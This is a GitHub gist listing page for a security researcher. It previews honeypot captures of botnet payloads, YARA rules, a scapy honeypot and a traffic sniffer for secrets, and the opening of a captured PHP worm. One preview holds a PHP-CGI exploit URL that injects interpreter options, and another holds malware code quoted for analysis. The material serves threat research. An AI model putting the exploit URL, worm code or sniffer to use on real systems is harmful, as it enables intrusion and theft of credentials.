Skip to content

Instantly share code, notes, and snippets.

View dustyfresh's full-sized avatar
👽

Dustin dustyfresh

👽
138 followers · 103 following
View GitHub Profile
@dustyfresh
dustyfresh / shrill-bread
Created February 21, 2017 22:20
codename shrill-bread botnet. Tracking with HoneyPress
> db.payloads.find({codename: 'shrill-bread'}).pretty()
{
"_id" : ObjectId("58a7b6935bfab60010aaf5de"),
"requests" : {
"1427a2c8-f585-11e6-b9ae-0242ac11000d" : {
"attack_meta" : {
"target_type" : "wp-login",
"target_name" : "unknown"
},
"time" : "1487386259",
@dustyfresh
dustyfresh / clicker.rs
Created January 28, 2017 23:07
click fast!
/* cargo.toml
[package]
name = "clicker"
version = "0.1.0"
authors = ["dustyfresh"]
[dependencies]
keystroke = "*"
kernel32-sys = "*"
user32-sys = "*"
@dustyfresh
dustyfresh / yara-code-audit.md
Created January 3, 2017 00:19
using YARA for finding bugs in PHP

YARA bad PHP code signatures

$ cat code_audit.yar
rule PHP_INFOLEAK
{
    strings:
        $leak1 = /phpinfo\s?\(|show_source\s?\(|highlight_file\s?\(/
    condition:
        $leak1
}
@dustyfresh
dustyfresh / honey.py
Last active September 15, 2020 16:42
quick and simple honeypot in python3 using scapy, and raw sockets file logging
#!/usr/bin/env python3
import argparse
import threading
from threading import Thread
from scapy.all import *
import logging
import socket
import chardet
def listen():
@dustyfresh
dustyfresh / sniff-example.py
Last active March 26, 2020 17:25
Sniff packets for secrets with python scapy
#!/usr/bin/env python3
from scapy.all import *
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import re
def packet_callback(packet):
if packet[TCP].payload:
pkt = str(packet[TCP].payload)
if packet[IP].dport == 80:
@dustyfresh
dustyfresh / do_not_scan.txt
Created October 7, 2016 13:34
textfile of ipv4 ranges to exclude from port scanning
# Martian ranges
0.0.0.0/8
10.0.0.0/8
100.64.0.0/10
127.0.0.0/8
127.0.53.53
169.254.0.0/16
172.16.0.0/12
192.0.0.0/24
192.0.2.0/24
@dustyfresh
dustyfresh / honeypress-payload-5.md
Last active August 16, 2016 04:23

Payload

> db.payloads.find({ip: '176.94.194.90'}).pretty()
{
	"_id" : ObjectId("577f2c88247fe0000e2831a8"),
	"Tor" : false,
	"ip" : "176.94.194.90",
	"user-agent" : "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
	"triggered_url" : "http://178.62.224.8/phppath/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D\"\"+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-n",
	"time" : "1467952264",
@dustyfresh
dustyfresh / honeypress-payload-3.md
Created June 22, 2016 16:34
linksys RCE botnet payload caught by HoneyPress

Payload found to be unrelated to WordPress. Seems to be trying to build a botnet by exploiting Linksys E-Series routers

> db.payloads.find({'ip': '179.158.120.213'}).pretty()
{
        "_id" : ObjectId("576a421f83932a00168098be"),
        "Tor" : false,
        "ip" : "179.158.120.213",
        "user-agent" : "Wget(linux)",
        "triggered_url" : "http://178.62.224.8/hndUnblock.cgi",
@dustyfresh
dustyfresh / checkTor.py
Created June 17, 2016 15:37
Check if an IP address is a Tor exit node or not. Requires the requests module.
#!/usr/bin/env python
import requests
import re
def checkTor(ip):
headers = {'user-agent': 'checkTor'}
exit_nodes = requests.get('https://check.torproject.org/exit-addresses', headers=headers)
exit_nodes = exit_nodes.text
if re.search(ip, exit_nodes):
return True
@dustyfresh
dustyfresh / honeypress-payload-2.md
Last active June 17, 2016 03:41
PHP malware

@dustyfresh

PHP Worm

This worm seems to be defunct now.. the C&C servers that this code references (over HTTP) don't seem to function any longer.

<?php
@ini_get("disable_functions");
if (!empty($disablefunc))
{
$disablefunc = str_replace(" ","",$disablefunc);